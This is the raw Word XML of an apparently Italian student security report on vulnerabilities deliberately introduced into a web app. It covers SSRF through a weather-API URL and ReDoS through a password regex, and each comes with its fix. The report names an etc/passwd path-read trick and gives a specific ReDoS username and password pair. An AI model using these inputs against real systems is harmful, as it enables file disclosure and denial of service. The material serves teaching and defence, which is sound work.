    <w:p w14:paraId="11F7A53F" w14:textId="25EA8B1B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49884262" w14:textId="4CAC5711" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F2A00B4" w14:textId="7DBDD47C" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5B15D8E6" w14:textId="11839ADB" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FA025F7" w14:textId="4ED0707D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D6410FD" w14:textId="4C927F2C" w:rsidR="004E3997" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C02E7A7" wp14:editId="2B259C3E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>86995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7127875" cy="1290320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="1536150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7875" cy="1290320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823C77A" w14:textId="79C4DE21" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="589C3028" w14:textId="356A5D85" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6F6B724D" w14:textId="796E364E" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="72A7439C" w14:textId="7E2411AF" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5CC8FA30" w14:textId="2A7C50BE" w:rsidR="004E3997" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A04EA61" wp14:editId="7E325466">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>71120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3200053" cy="1808515"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:wrapNone/>
            <wp:docPr id="187207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053" cy="1808515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F5D0B" w14:textId="4F9CD0FD" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="26D77838" w14:textId="0D15A711" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3199D3B5" w14:textId="56EC704C" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5591AB62" w14:textId="6889843C" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="18E15DC1" w14:textId="25F25FCE" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7911C580" w14:textId="0E8B660C" w:rsidR="00EF10FE" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E86598C" wp14:editId="14D69089">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-459740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3742798" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="908354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2798" cy="2987040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C183171" w14:textId="479A8920" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1E9C324F" w14:textId="3ADFDEE3" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3FA7ECC7" w14:textId="4A7A6A6B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="570673D5" w14:textId="06955180" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0662716E" w14:textId="6C4F13A9" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48F0ABCA" w14:textId="053D0DB3" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5AFE0051" w14:textId="77777777" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EDBDB7" w14:textId="77777777" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2C60141F" w14:textId="59B5973E" w:rsidR="00E464AA" w:rsidRPr="00576284" w:rsidRDefault="005E7293" w:rsidP="0006778F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00171715" w:rsidRPr="00576284">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>erver-Side Request Forgery(SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E127AD" w14:textId="3E9C4A90"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22C4354B" w14:textId="5A709258" w:rsidR="002666AE" w:rsidRDefault="00AD3339" w:rsidP="00467BBC">
      <w:r>
        <w:t>In questo esempio è</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> stat</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t xml:space="preserve"> aggiunta la possibilità di aprire un url esterno (meteo) di openWeatherMap sul backend. Per fare l’exploit di tale vulnerabilità basta sostituire l’url con un path sensibile come etc/passwd e in tal modo si può accedere alle informazioni salvate sul server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01740302" w14:textId="77777777" w:rsidR="00AD3339" w:rsidRDefault="00AD3339" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F82A8E2" w14:textId="7B351F51" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Meteo.jsx: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D7D74" w14:textId="3FFF5CBD" w:rsidR="00E464AA" w:rsidRDefault="001A57CF" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="138C2A3B" wp14:editId="4295914E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>142875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6255268" cy="233684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5268" cy="2336840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0B0E6" w14:textId="67CEC60B" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B000452" w14:textId="02B66077" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1723A4D0" w14:textId="7E37A1CC" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1C764485" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3692F509" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2BD5CFD7" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A547D0B" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4857CBA1" w14:textId="77777777" w:rsidR="00AD3339" w:rsidRDefault="00AD3339" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E1DE287" w14:textId="05571BCA" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC">
      <w:r>
        <w:t>HomeController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91CBF7" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1EC110B6" w14:textId="067397C3" w:rsidR="005E7293" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="454F97E8" wp14:editId="68DE30D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-470535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7126250" cy="3354565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="973813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6250" cy="3354565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>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77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="084A564A" w14:textId="5E5A0641" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B6522C4" w14:textId="3D1F4202" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="33609817" w14:textId="205C7F77" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="67FCA15F" w14:textId="77777777" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="069BB887" w14:textId="6FA3CCAA" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC">
      <w:r>
        <w:t>Caso normale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FB0B4" w14:textId="79EF7FEE" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="380C5466" wp14:editId="740BCD10">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3C190449" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2131E467" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23DC5664" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0F585680" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2028DE6F" w14:textId="77777777" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5E39CFF6" w14:textId="4BEB4166" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="539D528D" w14:textId="02951DFD" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0FE05C6C" w14:textId="0C46DF5A" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09E14F7E" wp14:editId="2D120D11">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>353695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6568289" cy="2588960"/>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68289" cy="2588960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005E7293">
        <w:t>Caso con attacco:</w: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2DE68A83" w14:textId="334B34E8" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5BECCB54" w14:textId="04D9E088" w:rsidR="005E7293" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r w:rsidR="00D83D81">
        <w:t xml:space="preserve">si usa una whitelist di domini consentiti da poter visitare lato backend in modo da bloccare i link non consentiti. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AAA8C" w14:textId="6CDDC339" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C3BDB25" w14:textId="2EA34D96" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5861AEA5" w14:textId="55A3E6AF" w:rsidR="00D72C3C" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39592FDF" wp14:editId="161EE7C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-471805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6783705" cy="3592370"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="1336491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3705" cy="3592370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12D79A" w14:textId="72183ECC" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48E25F87" w14:textId="50A8D7E1" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1CF5E927" w14:textId="2CDE2CEF" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="52F337BC" w14:textId="77777777" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="48157CE8" w14:textId="77777777" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="058A00F5" w14:textId="0C1D2868" w:rsidR="00D72C3C" w:rsidRDefault="00D72C3C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B2359A3" w14:textId="77777777"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2EEA9A69" w14:textId="5A288779" w:rsidR="005E7293" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Regex DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F1657" w14:textId="744BF3EA" w:rsidR="00FA683C" w:rsidRDefault="00FA683C" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ReDos è un attacco di tipo Denial of Service, generato dall’utilizzo di espressioni regolari che se portati ad una situazione estrema in cui vengono inseriti tanti caratteri, fanno bloccare il programma nella fase di validazione del pattern, causando quindi un Denial of Service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C59BB38" w14:textId="052635EE" w:rsidR="00A74318" w:rsidRDefault="00FA683C" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nel nostro caso è</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> stata introdotta una regex per validare la password con lo username, in modo tale che la password non possa contenere lo username all’interno.  Funziona con utenti normali ma mettendo come username: </w:t>
      </w:r>
      <w:r w:rsidR="00A74318" w:rsidRPr="00A74318">
        <w:t>^(a+)+$</w:t>
      </w:r>
      <w:r w:rsidR="00A74318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF800CF" w14:textId="3308B9AE" w:rsidR="00A74318" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74318">
        <w:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE4DFB" w14:textId="39323D95" w:rsidR="00A74318" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Si blocca e va in errore generando un DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C9ECF" w14:textId="511AEE7B" w:rsidR="00A74318" w:rsidRDefault="00A74318" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>SignUp.jsx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49376040" w14:textId="5C594A2D" w:rsidR="00C87C03" w:rsidRPr="00A74318" w:rsidRDefault="00C87C03" w:rsidP="00A74318">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22278544" w14:textId="687F9276" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18E93E91" wp14:editId="0122AB36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>17145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5478780" cy="726468"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1070878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726468"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D6B7D" w14:textId="48957BF1" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="12010828" w14:textId="56D581AE" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="632AD650" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="160F03FC" w14:textId="4EF68A77" w:rsidR="005E7293" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A093B3" wp14:editId="5159D299">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-56705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4C7BF25A" w14:textId="4673B863" w:rsidR="00D03FA6" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r w:rsidR="00D95D77">
        <w:t>abbiamo sostituito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la evil regex con un normale controllo sulla password</w:t>
      </w:r>
      <w:r w:rsidR="00D95D77">
        <w:t xml:space="preserve">, usando il metodo includes() di JavaScript. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080AB12" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="22F15C86" w14:textId="7D6CA828" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="317B147C" wp14:editId="359A66B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>54610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5560695" cy="1483727"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="65596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0695" cy="1483727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D66BAC" w14:textId="1C64942E" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FE52DC3" w14:textId="2C676D41" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="351AF7D1" w14:textId="421CF793" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BA50017" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="79A790D2" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="121AFFC4" w14:textId="77777777" w:rsidR="00DE7E9C" w:rsidRDefault="00DE7E9C" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7E4D74B7" w14:textId="180EDC39" w:rsidR="00BC247B" w:rsidRDefault="00BC247B" w:rsidP="00BC247B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nsecure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
